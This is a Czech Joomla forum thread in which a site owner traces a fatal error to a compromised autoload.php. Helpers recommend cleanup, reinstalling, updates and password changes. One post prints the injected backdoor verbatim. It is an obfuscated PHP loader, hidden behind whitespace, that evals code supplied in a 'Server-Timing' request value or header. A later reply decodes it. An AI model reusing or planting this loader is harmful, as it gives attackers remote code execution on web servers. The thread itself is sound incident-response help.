nefunkční stránky

Jan
28. zář 2021 17:13 #144868
Dobrý den,

něvěděl byste prosím někdo co s tím? Náhle stránky nefungují. Nedělal jsem žádné aktualizace ani změny. Zobrazuje se pouze chybová hláška:

Fatal error: Call to undefined function getallheaders() in /data/web/virtuals/89067/virtual/www/libraries/vendor/autoload.php on line 1


Ve Wedosu říkají, že na jejich straně žádná chyba není.

Děkuji za případnou radu.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Ernst
28. zář 2021 20:55 - 28. zář 2021 20:58 #144871
Možností je mnoho.
Možná by trochu pomohl odkaz na ty stránky s chybou.
Nedělal wedos třeba změnu PHP? Opravdu jste neaktualizoval jste joomlu nebo nějaké její rozšíření?
Nenahrával jste nějaký obsah pomocí ftp?
Zapněte si hlášení chyb na "Vývoj" v konfiguraci joomla a zkuste, co vám to bude psát navíc.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Cony
29. zář 2021 01:25 #144874

Jan napsal: Fatal error: Call to undefined function getallheaders() in /data/web/virtuals/89067/virtual/www/libraries/vendor/autoload.php on line 1

V souboru libraries/vendor/autoload.php volání této funkce standardně není. Zkontroloval bych tedy primárně, jestli nemáte stránky napadené.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Jan
29. zář 2021 10:53 #144878
Děkuji za odpověď.

právě, že jsem na těch stránkách nedělal půl roku vůbec nic a šlapou léta. Ještě jsem znovu napsal do Wedosu, aby mi potvrdili, že neprováděli žádnou změnu, ale to by mi asi řekli rovnou (koukali se na to přes FTP). Mám PHP 5.4, které by prý bylo vhodné aktualizovat (ale tím by to být němělo).

Je to doména www.jankostka.cz

Do administrace Joomly se klasicky nedostanu, takže hlášení chyb na "vývoj" nevím, kde bych zapnul.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Jan
29. zář 2021 10:55 #144879
Existuje nějaký nástroj, kterým bych zkontroloval napadení webu? Děkuji

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Cony
29. zář 2021 11:52 #144880
PHP 5.4? A verze Joomly? S kontrolou bych začal tak, že bych si přes FTP prohlédl ten soubor libraries/vendor/autoload.php,
popř. porovnal s originálem z instalačky.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Jan
29. zář 2021 14:16 - 29. zář 2021 14:50 #144884
Na soubor autoload.php jsem se kouknul hned jako první, ale bohužel nemám znalosti, abych posoudil jestli je v pořádku. Rád bych ho porovnal s originálem, ale bez administračního rozhraní nevím jak zjistit přesnou verzi Joomla. V tom souboru je tohle:

<?php $_HEADERS = getallheaders();if(isset($_HEADERS)){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x52E\x51\x55E\x53\x54[\x22\x53e\x72\x76e\x72\x2dT\x69\x6di\x6e\x67\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fH\x45\x41D\x45\x52S\x5b\x22S\x65\x72v\x65\x72-\x54\x69m\x69\x6eg\x22\x5d)\x3b";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}


// autoload.php @generated by Composer

require_once __DIR__ . '/composer' . '/autoload_real.php';

return ComposerAutoloaderInit205c915b9c7d3e718e7c95793ee67ffe::getLoader();

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Cony
29. zář 2021 14:24 #144885
A to tam právě nemá co dělat. Konkrétně u tohoto souboru se obsah nezměnil snad nikdy, takže lze porovnat z jakoukoliv verzí Joomly. Je to kód, kterým Vám na serveru spustí jakýkoliv kód. Štěstí v neštěstí máte v tom, že Váš server neumí funkcí getallheaders, proto to padá, místo aby to škodilo. I tak ale máte web zavirován.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Bong
29. zář 2021 14:31 - 29. zář 2021 14:34 #144886
Ten soubor by měl začínat:

<?php

// autoload.php @generated by Composer

require_once __DIR__ . '/composer/autoload_real.php';

řekl bych, že máte problém...

Verzi Joomly zjistíte třeba tak, že si obrazíte soubor: vasedomena.cz/administrator/manifests/files/joomla.xml

Hacknutou Joomlu opravíte takto:
www.bongovo.cz/joomla/40-jak-zachranit-hacknutou-joomlu

Joomlu opravíte takto:
www.joomlaportal.cz/jak-zacit/632-univer...ava-instalace-joomly

I'm sorry, my responses are limited...you must ask the right questions.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Jan
29. zář 2021 14:36 #144887
Tak super, aspoň už víme kde je chyba. Je tedy zajímavé, že část kodu se objevila až po klasickém zkopírování Ctrl C+V jinak vidět není. Tak já to zkusím dát do původního stavu a snad se to rozběhne. Zatím děkuji moc

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Cony
29. zář 2021 22:28 #144898
Kód bude mít na začátku hromadu mezer, nebo tabelátorů, při rychlém náhledu je pak "za rohem" a není na první pohled vidět.

Každopádně je ale potřeba zjistit, jak k hacku došlo, vše aktualizovat, změnit všechny hesla, jinak to tam máte za chvíli zpět.

Pokud máte na webu uživatele, měl by jste také teoreticky informovat ÚOOZ o možném úniku dat uživatelů...

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Ernst
30. zář 2021 09:46 #144900

Jan napsal: Existuje nějaký nástroj, kterým bych zkontroloval napadení webu? Děkuji


zkuste sitecheck.sucuri.net/

ale u vás to ani nedoběhne, tak je problém asi větší

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Ernst
30. zář 2021 09:55 #144901
na začátku toho php máte vlastně tenhle kód
?php @eval($_REQUEST["Server-Timing\"]);
@eval($_HEADERS["Server-Timing"]);

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Jan
30. zář 2021 10:42 #144902
Tak jsem to začal čistit ručně podle chybových hlášek. Vždy jsem soubor porovnal s novou instalací a vymazal škodlivý kód.
Když jsem opravil jeden soubor, tak se to seklo na dalším souboru atd. Což bylo fajn, alespoň jsem věděl, kde to je. Ale po vyčištění asi pátého souboru už žádná chybová hláška nepřišla a objevila se jenom prázdná obrazovka. A jsem v koncích.
Podle vašich odkazů pokud není k dispozici záloha je potřeba to čistit ručně (záloha k dispozici není). Neexistuje třeba nějaký opravný balíček, který by to přeinstaloval, nebo tak něco? Je to tedy Joomla 3.6.5.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Cony
30. zář 2021 12:20 #144905
"Opravný" balíček je plná instalačka Joomly. Ale ani to není celé řešení, protože tím jen přepíšete soubory jádra, které možná nějaký hack obsahují, ale nevyřešíte tím
- soubory dalších rozšíření (tam by pomohla reinstalace těch rozšíření)
- ale hlavně ne soubory, které jsou tam navíc - tj. soubory, které hack přidal a standardně v Joomle nejsou.

Pokud se necítíte na pročišťování, spíš bych udělal to, že bych si někde vedle nainstaloval znovu čistou Joomlu 3.6.5, se všemi rozšířeními a šablonami co tam máte, a pak bych zaměnil databázi za to z té živé instalace. Nakonec překopírovat složku images,
ale před tím ji ještě pročistit od všeho co tam nepatří (hlavně soubory *.php a .htaccess).

A pak samozřejmě vše zaktualizovat, problém bude právě ta Joomla 3.6.5 - pokud se nepletu tak někde kolem této verze byla právě chyba, která umožňovala útočníkům nahrávat soubory. No a anakonec změnit všechna hesla (Databáze, FTP, admin, uživatelé...)
Poděkovali: Jan

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.